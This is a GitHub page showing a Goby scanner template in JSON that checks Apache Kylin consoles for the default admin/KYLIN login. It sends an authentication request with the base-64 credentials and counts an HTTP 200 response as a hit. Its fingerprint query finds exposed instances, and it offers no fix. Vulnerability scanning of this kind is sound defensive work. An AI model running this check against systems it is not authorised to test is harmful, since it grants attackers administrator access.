-
Notifications
You must be signed in to change notification settings - Fork 8
/
Apache_Kylin_Console_Default_password.json
56 lines (56 loc) · 2.11 KB
/
Apache_Kylin_Console_Default_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
{
"Name": "Apache Kylin Console Default password",
"Level": "1",
"Tags": [
"Default password"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console",
"Product": "Apache Kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p>The attacker will log into the background as an administrator to further attack</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/user/authentication",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46S1lMSU4=",
"Cookie": "project=null"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "!=",
"value": "401",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 15:51:21",
"GobyVersion": "1.8.255"
}